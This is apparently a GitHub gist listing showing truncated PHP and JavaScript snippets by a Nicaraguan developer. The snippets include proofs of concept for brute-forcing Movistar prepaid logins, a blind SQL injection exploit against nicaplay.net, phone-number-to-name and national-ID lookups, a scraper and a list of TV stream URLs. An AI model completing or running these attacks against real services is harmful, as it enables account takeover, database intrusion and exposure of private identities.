This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
# P0C: Movistar PostPago 2 Nombre utiizando puntofacil.us | |
# por Carlos Ernesto López <celopez1990.blogspot.com> | |
function getNombreMovistar( $num ) { | |
$ch = curl_init( 'https://www.puntofacil.us/getBills' ); | |
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); | |
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/json;charset=UTF-8')); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Movistar Prepago Centroamérica :: Prueba de Concepto de acceso por fuerza bruta | |
// Creado por Carlos Ernesto López | |
// facebook.com/c.ernest.1990 || celopez1990.blogspot.com | |
// Post Original: http://celopez1990.blogspot.com/2015/01/alguien-le-puede-hacer-entender.html | |
function movCrack( numero, inicio, fin ) { | |
$logueado = false; | |
$counter = inicio; | |
for( x=inicio;x<fin;x++ ) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
# [ IDENTIFICADOR DE LLAMADAS PARA NICARAGUA ] | |
# Creado por Carlos Ernesto López <celopez1990.blogspot.com> | |
# Contacto: [email protected] || facebook.com/c.ernest.1990 | |
# Inspirado por la historia de Juan y Juanita | |
# http://celopez1990.blogspot.com/2015/04/juan-y-juanita.html (16 de abril de 2015) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/** | |
* www.nicaplay.net Blind SQL Injection Exploit | |
* Por Cigarritos Inc | |
*/ | |
$idusuario = (int) $argv[1]; | |
if( $idusuario <= 0 ) | |
exit( "Uso: php nicaplay_xpl.php idusuario\nEjemplo: php nicaplay_xpl.php 1" ); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
# Obtiene Info de Cédula desde el CSE | |
# By Carlos Ernesto López | Junio 2, 2015 | |
# https://github.com/carloslopez1990/info_cedula_cse | |
$cedula = str_replace( array( ' ', '-' ), '', $_REQUEST['cedula'] ); | |
if( !preg_match('|^[0-9]{13}[a-zA-Z]{1}$|', $cedula) ) | |
exit('ERROR: CEDULA INVALIDA'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
define('BCN_URL', 'http://www.bcn.gob.ni/estadisticas/mercados_cambiarios/tipo_cambio/cordoba_dolar/mes.php'); | |
function getCambioMes( $mes, $anio ) { | |
if( strlen((int)$mes) == 1 ) | |
$mes = '0'.$mes; | |
preg_match_all('|<td><div align="center">(.*?)\-(.*?)</div></td>\s*<td><div align="center">(.*?)</div></td>|is', | |
file_get_contents(BCN_URL.'?mes='.$mes.'&anio='.$anio), $matches); | |
$ret = array(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
// Carlos Lopez's Firmware LZMA Extractor for Windows | |
// Requires 7-Zip (http://www.7-zip.org/) | |
// <3 León, Nicaragua | |
// facebook.com/carlos.ernesto.1990 | |
// 22/11/2017 | |
if( !function_exists('hex2bin') ) { | |
function hex2bin( $input ) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Canal 2: http://138.117.4.70:8079/streams/d/Canal-2/playlist.m3u8 | |
Canal 4: http://138.117.4.70:8079/streams/d/Canal-4/playlist.m3u8 | |
Canal 6: http://138.117.4.70:8079/streams/d/Canal-6/playlist.m3u8 | |
Canal 8: http://138.117.4.70:8079/streams/d/Canal-25/playlist.m3u8 | |
Canal 9: http://138.117.4.70:8079/streams/d/Canal-9/playlist.m3u8 | |
Canal 10: http://138.117.4.70:8079/streams/d/Canal-10/playlist.m3u8 | |
Canal 11: http://138.117.4.70:8079/streams/d/Canal-11/playlist.m3u8 | |
Canal 12: http://138.117.4.70:8079/streams/d/Canal-12/playlist.m3u8 | |
Canal 13: http://138.117.4.70:8079/streams/d/Canal-13/playlist.m3u8 | |
Canal 15: http://138.117.4.70:8079/streams/d/Canal-15/playlist.m3u8 |